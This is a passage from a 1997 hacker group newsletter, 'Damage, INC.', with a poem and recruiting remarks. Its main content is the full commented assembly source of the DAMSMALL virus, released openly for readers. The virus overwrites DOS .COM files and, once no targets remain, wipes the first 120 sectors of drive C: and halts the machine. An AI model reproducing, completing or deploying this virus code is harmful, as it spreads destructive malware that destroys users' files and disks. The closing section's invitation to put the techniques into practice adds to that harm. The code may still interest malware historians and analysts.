                      B.B.S.es ON THE INTERNET
                   www.digitalis.net/~messer/bbs/

                       THE WORLD OF B.B.S.ing
                www-scf.usc.edu/~thuyenqu/bbsing.htm


SOURCE AND SCRIPTS -                                               {SOURCE}

Virus Name:  DAMSMALL
Variants:    None
Status:      New
Written:     December 1997
Symptoms:    Infected .COM files, C: is nuked if activated
Origin:      Canada
Length:      90 to 105 bytes (with nuke procedure)
Type Code:   .COM Infector
Detection Method:      F-PROT Heuristics
Removal Instructions:  Delete all infected files.  They cannot be cleaned since
                       the start of their code is overwritten.

General Comments:  The DAMSMALL virus infects .COM files by overwriting them.
                   It alters the date/time stamp of infected files but doesn't
                   increase their size.  The infected files simply become a copy
                   of the actual virus (the first 90-105 bytes).  The virus will
                   activate the nuke procedure when there aren't any .COM files
                   in the current directory to infect.  Upon activation, it will
                   nuke the first 120 sectors of drive C: and then halt the CPU.
                   It's a very small, simple virus.  There are no variants of
                   the DAMSMALL virus.  I'm releasing the commented source code
                   so that readers can use it as a learning tool.

-------------------------------------------------------------------------------
; [DAMSMALL] virus (105 bytes)
; Written by BLACKENED of Damage, INC. (C)opyright 1997.
; TASM /M DAMSMALL.ASM  TLINK /T DAMSMALL.OBJ to assemble.

code    segment
        assume  ds:code, ss:code, cs:code, es:code
        org     100h                    ;All COM files start here

virus_length    equ finish - start      ;Length of the virus

start   label near

damage  proc    near

id      db 'DI'                         ;The virus ID is DI which stands
                                        ;for Damage, INC.
damage  endp

main    proc    near

        mov     ah,4eh                  ;Find first file function
        mov     cx,00100111b            ;CX holds attribute mask
        mov     dx,offset filespec      ;DX points to *.COM files

findlp:
        int     21h                     ;Call DOS to execute function
        jb      nuke                    ;Nuke if there are no COM files
        call    infect                  ;Attempt to infect the file.
        jne     exit                    ;Exit if we were successful.
        mov     ah,4fh                  ;Find next file function
        jmp     short findlp            ;Repeat process

exit:
        mov     ax,04C00h               ;Terminate program
        int     21h                     ;Return to DOS

main    endp

nuke    proc    near

        cli                             ;Prevent all interrupts
        mov     ah,03                   ;BIOS write sectors
        mov     al,120                  ;Number of sectors to nuke
        mov     ch,00                   ;Cylinder
        mov     cl,01                   ;Sector number
        mov     dh,00                   ;Head number
        mov     dl,80h                  ;Drive C:
        int     13h

        hlt                             ;Halt CPU

nuke    endp

infect  proc    near

        mov     ax,3d02h                ;DOS Open the file
        mov     dx,80h+1eh              ;Moves filename into dx
        int     21h                     ;Execute function
        xchg    bx,ax                   ;Save handle to BX

        mov     ah,3Fh                  ;DOS Read from file function
        mov     cx,2                    ;CX holds 2 bytes to read
        mov     dx,offset holdit        ;DX points to holdit buffer
        int     21h

        cmp     word ptr [holdit],4944h ;Are the two bytes "DI"?
        pushf                           ;Save flags
        je      close                   ;Yes, close the infected file.

        xor     dx,dx                   ;Zero DX
        xor     cx,cx                   ;Zero CX

        mov     ax,4200h                ;File seek function at
        int     21h                     ;the start.

        mov     ah,40h                  ;DOS Write file function
        mov     dx,offset start         ;DX points to start of code
        mov     cx,virus_length         ;Put size of virus in CX
        int     21h                     ;Write virus into file

close:
        mov     ah,3eh                  ;DOS Close file function
        int     21h                     ;The file is now infected and closed
        popf                            ;Restore flags
        ret                             ;Return

holdit  dw      ?                       ;Buffer used to hold first 2 bytes

infect  endp

filespec db '*.COM',0                   ;File type is *.COM

finish  label near

code    ends
        end     damage
-------------------------------------------------------------------------------


THOUGHTS, POEMS AND CREATIVE WRITING -                            {WRITING}
Awakening:

I traverse into the darkness, like a soldier on a search and destroy mission
that's encompassed by the jungle of Vietnam.  Stealthfully I journey onward
towards the source of my own existence, limitations and ultimate downfall.

As I look into the blinding blackness, I find the enemy within.  My mind
is now clear and sound.  The obscure, disturbing thoughts have faded to black
and I realize the true meaning of my discovery.

Everyone has an enemy within them.  To contemplate its destruction, you must
understand its purpose.  To comprehend its purpose you must know how the
enemy attacks your own thoughts and lives in your inner being.

The enemy devours creativity, innovativeness, individualism and free thought.
It preys upon your weakness and drains your ideas and opinions away.

True freedom can only be obtained by making a conscious decision not to
conform.  Fight against control.  Break free of the shackles that bind you
and experience reality.

Self-awakening cannot be explained.  To achieve enlightenment, you must define
your own uniqueness and live by it.  Eliminate the enemy and you will be free.



Someone once said that nothing you say hasn't already been said.  Poetry
disproves that statement.  It demonstrates that the written word can be used
in different combinations to convey an idea, message or simple thought.  The
power of it lies in the way the words are expressed.  That is what makes each
poem unique.  If you found this short poem to be interesting and thought
provoking, then that's great.  If not, then perhaps you weren't able to grasp
the symbolism and meaning.  This section is a recent addition to the
Damage, INC. Newsletter.  The poem above was written by BLACKENED.  We will
also publish interesting, thought provoking poems that are sent to us by our
readers.  The frequency and status of this new section are in question at this
point in time.  In other words, the determining factor is the amount of quality
material that we have to work with.  Therefore, this section might not exist
in every issue of the Damage, INC. Newsletter.

Written by BLACKENED ? Damage, INC. (C)opyright 1997.


CLOSING COMMENTS -                                                {CLOSING}
BLACKENED's Hostile Closing Comments:

Damage, INC. is proud of the Damage, INC. Newsletter and this December issue.
I'm personally pleased with the overall results we've achieved after many hours
of dedicated work.  I honestly hope that you enjoy reading what we've written.
Also, we want you to let us know if you've learned anything, used any of the
information that we've shared, or put a technique into practice.

I admit, not every paragraph is eloquently written and our articles aren't all
literary classics by any means, but we *always* strive for excellence.  Quality
is extremely important to us.  We try to have a theme for each issue.  In fact,
we believe that nothing else should be allowed to outweigh the actual message.
That is why most of our time is spent making sure a clear message is presented
to the readers.  The majority of the information in this issue is geared towards
h/p newbies.  However, that will change in the future.  More advanced h/p
related tips, methods, techniques etc. will be included for those that already
have some knowledge and experience... and haven't just entered the h/p scene.
If you aren't a newbie don't despair, continue reading the Damage, INC.
Newsletter.  In the meantime, you can become involved and contribute.  That'll
speed up the process of educating newbies, and we can then move forward.  Last
but not least, have a happy fucking New Year!  ;)

We're still looking for Writers, Members and Distribution Sites.  If you'd like
to apply to Damage, INC. and join a respected h/p group, then download a copy of
the Damage, INC. Application Generator.  If you want any of our releases, they
are currently available on the following boards:

...AND JUSTICE FOR ALL - Damage, INC. WHQ, h/p/a/c/v/t, no ratios, invite only.
Freedom of Information Archives - Damage, INC. Dist. Site, h/p/a/c/v/t.
Distraught Continuum - h/p/a/c/v/t, programming, etc.

Any feedback or letters to the editor should be sent to BLACKENED in Email on
on a Damage, INC. board near you.  I can also be contacted via Echomail/Netmail
in several nets.

- EOF